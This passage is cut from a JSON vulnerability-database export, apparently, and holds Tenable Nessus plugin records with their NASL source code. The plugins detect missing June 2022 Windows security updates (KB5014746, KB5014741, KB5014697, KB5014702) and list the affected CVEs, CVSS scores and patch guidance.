"CVE-2022-21127", "CVE-2022-21166", "CVE-2022-30135", "CVE-2022-30136", "CVE-2022-30140", "CVE-2022-30141", "CVE-2022-30142", "CVE-2022-30143", "CVE-2022-30146", "CVE-2022-30147", "CVE-2022-30149", "CVE-2022-30151", "CVE-2022-30152", "CVE-2022-30153", "CVE-2022-30154", "CVE-2022-30155", "CVE-2022-30160", "CVE-2022-30161", "CVE-2022-30162", "CVE-2022-30163", "CVE-2022-30164", "CVE-2022-30166", "CVE-2022-30190"], "modified": "2023-01-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUN_5014746.NASL", "href": "https://www.tenable.com/plugins/nessus/162202", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162202);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/13\");\n\n script_cve_id(\n \"CVE-2022-21123\",\n \"CVE-2022-21125\",\n \"CVE-2022-21127\",\n \"CVE-2022-21166\",\n \"CVE-2022-30135\",\n \"CVE-2022-30136\",\n \"CVE-2022-30140\",\n \"CVE-2022-30141\",\n \"CVE-2022-30142\",\n \"CVE-2022-30143\",\n \"CVE-2022-30146\",\n \"CVE-2022-30147\",\n \"CVE-2022-30149\",\n \"CVE-2022-30151\",\n \"CVE-2022-30152\",\n \"CVE-2022-30153\",\n \"CVE-2022-30154\",\n \"CVE-2022-30155\",\n \"CVE-2022-30160\",\n \"CVE-2022-30161\",\n \"CVE-2022-30162\",\n \"CVE-2022-30163\",\n \"CVE-2022-30164\",\n \"CVE-2022-30166\",\n \"CVE-2022-30190\"\n );\n script_xref(name:\"MSKB\", value:\"5014738\");\n script_xref(name:\"MSKB\", value:\"5014746\");\n script_xref(name:\"MSFT\", value:\"MS22-5014738\");\n script_xref(name:\"MSFT\", value:\"MS22-5014746\");\n script_xref(name:\"IAVA\", value:\"2022-A-0240-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0241-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/05\");\n script_xref(name:\"CEA-ID\", 
value:\"CEA-2022-0022\");\n\n script_name(english:\"KB5014746: Windows Server 2012 R2 Security Update (June 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5014746. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-30136)\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30141,\n CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Windows Hyper-V Remote Code Execution Vulnerability (CVE-2022-30163)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014738\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014746\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5014746 or Cumulative Update 5014738\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30136\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office 
Word MSDTJS');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-06';\nkbs = make_list(\n '5014746',\n '5014738'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3',\n sp:0,\n 
rollup_date:'06_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014746, 5014738])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-13T18:50:09", "description": "The remote Windows host is missing security update 5014741. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-30136)\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Windows Hyper-V Remote Code Execution Vulnerability (CVE-2022-30163)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "nessus", "title": "KB5014741: Windows Server 2012 Security Update (June 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21123", "CVE-2022-21125", "CVE-2022-21127", "CVE-2022-21166", "CVE-2022-30135", "CVE-2022-30136", "CVE-2022-30140", "CVE-2022-30141", "CVE-2022-30142", "CVE-2022-30143", "CVE-2022-30146", "CVE-2022-30147", "CVE-2022-30149", "CVE-2022-30151", "CVE-2022-30152", "CVE-2022-30153", "CVE-2022-30154", "CVE-2022-30155", "CVE-2022-30160", "CVE-2022-30161", "CVE-2022-30163", "CVE-2022-30164", "CVE-2022-30166", "CVE-2022-30190"], "modified": "2023-01-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUN_5014741.NASL", "href": "https://www.tenable.com/plugins/nessus/162194", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162194);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/13\");\n\n script_cve_id(\n \"CVE-2022-21123\",\n \"CVE-2022-21125\",\n \"CVE-2022-21127\",\n \"CVE-2022-21166\",\n \"CVE-2022-30135\",\n \"CVE-2022-30136\",\n \"CVE-2022-30140\",\n \"CVE-2022-30141\",\n \"CVE-2022-30142\",\n \"CVE-2022-30143\",\n \"CVE-2022-30146\",\n \"CVE-2022-30147\",\n \"CVE-2022-30149\",\n \"CVE-2022-30151\",\n \"CVE-2022-30152\",\n \"CVE-2022-30153\",\n \"CVE-2022-30154\",\n \"CVE-2022-30155\",\n \"CVE-2022-30160\",\n \"CVE-2022-30161\",\n \"CVE-2022-30163\",\n \"CVE-2022-30164\",\n \"CVE-2022-30166\",\n \"CVE-2022-30190\"\n );\n script_xref(name:\"MSKB\", value:\"5014741\");\n script_xref(name:\"MSKB\", value:\"5014747\");\n script_xref(name:\"MSFT\", value:\"MS22-5014741\");\n script_xref(name:\"MSFT\", value:\"MS22-5014747\");\n script_xref(name:\"IAVA\", value:\"2022-A-0240-S\");\n script_xref(name:\"IAVA\", 
value:\"2022-A-0241-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/05\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0022\");\n\n script_name(english:\"KB5014741: Windows Server 2012 Security Update (June 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5014741. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-30136)\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30141,\n CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Windows Hyper-V Remote Code Execution Vulnerability (CVE-2022-30163)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014741\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014747\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5014741 or Cumulative Update 5014747\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30136\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n 
script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word MSDTJS');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-06';\nkbs = make_list(\n '5014747',\n '5014741'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2',\n sp:0,\n rollup_date:'06_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014747, 5014741])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-16T17:48:16", "description": "The remote Windows host is missing security update 5014697. 
It is, therefore, affected by multiple vulnerabilities\n\n - Windows Kerberos Elevation of Privilege Vulnerability (CVE-2022-30165)\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30139, CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Windows Hyper-V Remote Code Execution Vulnerability (CVE-2022-30163)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "nessus", "title": "KB5014697: Windows 11 Security Update (June 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21123", "CVE-2022-21125", "CVE-2022-21127", "CVE-2022-21166", "CVE-2022-30132", "CVE-2022-30139", "CVE-2022-30140", "CVE-2022-30141", "CVE-2022-30142", "CVE-2022-30143", "CVE-2022-30145", "CVE-2022-30146", "CVE-2022-30147", "CVE-2022-30148", "CVE-2022-30149", "CVE-2022-30150", "CVE-2022-30151", "CVE-2022-30152", "CVE-2022-30153", "CVE-2022-30155", 
"CVE-2022-30160", "CVE-2022-30161", "CVE-2022-30162", "CVE-2022-30163", "CVE-2022-30164", "CVE-2022-30165", "CVE-2022-30166", "CVE-2022-30190"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUN_5014697.NASL", "href": "https://www.tenable.com/plugins/nessus/162188", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162188);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21123\",\n \"CVE-2022-21125\",\n \"CVE-2022-21127\",\n \"CVE-2022-21166\",\n \"CVE-2022-30132\",\n \"CVE-2022-30139\",\n \"CVE-2022-30140\",\n \"CVE-2022-30141\",\n \"CVE-2022-30142\",\n \"CVE-2022-30143\",\n \"CVE-2022-30145\",\n \"CVE-2022-30146\",\n \"CVE-2022-30147\",\n \"CVE-2022-30148\",\n \"CVE-2022-30149\",\n \"CVE-2022-30150\",\n \"CVE-2022-30151\",\n \"CVE-2022-30152\",\n \"CVE-2022-30153\",\n \"CVE-2022-30155\",\n \"CVE-2022-30160\",\n \"CVE-2022-30161\",\n \"CVE-2022-30162\",\n \"CVE-2022-30163\",\n \"CVE-2022-30164\",\n \"CVE-2022-30165\",\n \"CVE-2022-30166\",\n \"CVE-2022-30190\"\n );\n script_xref(name:\"MSKB\", value:\"5014697\");\n script_xref(name:\"MSFT\", value:\"MS22-5014697\");\n script_xref(name:\"IAVA\", value:\"2022-A-0240-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0241-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/05\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0022\");\n\n script_name(english:\"KB5014697: Windows 11 Security Update (June 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing 
security update 5014697. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Kerberos Elevation of Privilege Vulnerability (CVE-2022-30165)\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30139,\n CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Windows Hyper-V Remote Code Execution Vulnerability (CVE-2022-30163)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014697\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5014697\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30190\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30165\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word MSDTJS');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/14\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-06';\nkbs = make_list(\n '5014697'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:22000,\n rollup_date:'06_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014697])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-13T18:50:41", "description": "The remote Windows host is missing security update 5014702. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-30136)\n\n - Windows Kerberos Elevation of Privilege Vulnerability (CVE-2022-30165)\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30139, CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "nessus", "title": "KB5014702: Windows 10 Version 1607 and Windows Server 2016 Security Update (June 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21123", "CVE-2022-21125", "CVE-2022-21127", "CVE-2022-21166", "CVE-2022-30131", "CVE-2022-30136", "CVE-2022-30139", "CVE-2022-30140", "CVE-2022-30141", 
"CVE-2022-30142", "CVE-2022-30143", "CVE-2022-30145", "CVE-2022-30146", "CVE-2022-30147", "CVE-2022-30148", "CVE-2022-30149", "CVE-2022-30150", "CVE-2022-30151", "CVE-2022-30152", "CVE-2022-30153", "CVE-2022-30154", "CVE-2022-30155", "CVE-2022-30160", "CVE-2022-30161", "CVE-2022-30162", "CVE-2022-30163", "CVE-2022-30164", "CVE-2022-30165", "CVE-2022-30166", "CVE-2022-30190"], "modified": "2023-01-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUN_5014702.NASL", "href": "https://www.tenable.com/plugins/nessus/162196", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162196);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/13\");\n\n script_cve_id(\n \"CVE-2022-21123\",\n \"CVE-2022-21125\",\n \"CVE-2022-21127\",\n \"CVE-2022-21166\",\n \"CVE-2022-30131\",\n \"CVE-2022-30136\",\n \"CVE-2022-30139\",\n \"CVE-2022-30140\",\n \"CVE-2022-30141\",\n \"CVE-2022-30142\",\n \"CVE-2022-30143\",\n \"CVE-2022-30145\",\n \"CVE-2022-30146\",\n \"CVE-2022-30147\",\n \"CVE-2022-30148\",\n \"CVE-2022-30149\",\n \"CVE-2022-30150\",\n \"CVE-2022-30151\",\n \"CVE-2022-30152\",\n \"CVE-2022-30153\",\n \"CVE-2022-30154\",\n \"CVE-2022-30155\",\n \"CVE-2022-30160\",\n \"CVE-2022-30161\",\n \"CVE-2022-30162\",\n \"CVE-2022-30163\",\n \"CVE-2022-30164\",\n \"CVE-2022-30165\",\n \"CVE-2022-30166\",\n \"CVE-2022-30190\"\n );\n script_xref(name:\"MSKB\", value:\"5014702\");\n script_xref(name:\"MSFT\", value:\"MS22-5014702\");\n script_xref(name:\"IAVA\", value:\"2022-A-0240-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0241-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/05\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0022\");\n\n 
script_name(english:\"KB5014702: Windows 10 Version 1607 and Windows Server 2016 Security Update (June 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5014702. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-30136)\n\n - Windows Kerberos Elevation of Privilege Vulnerability (CVE-2022-30165)\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30139,\n CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014702\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5014702\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30136\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word MSDTJS');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n 
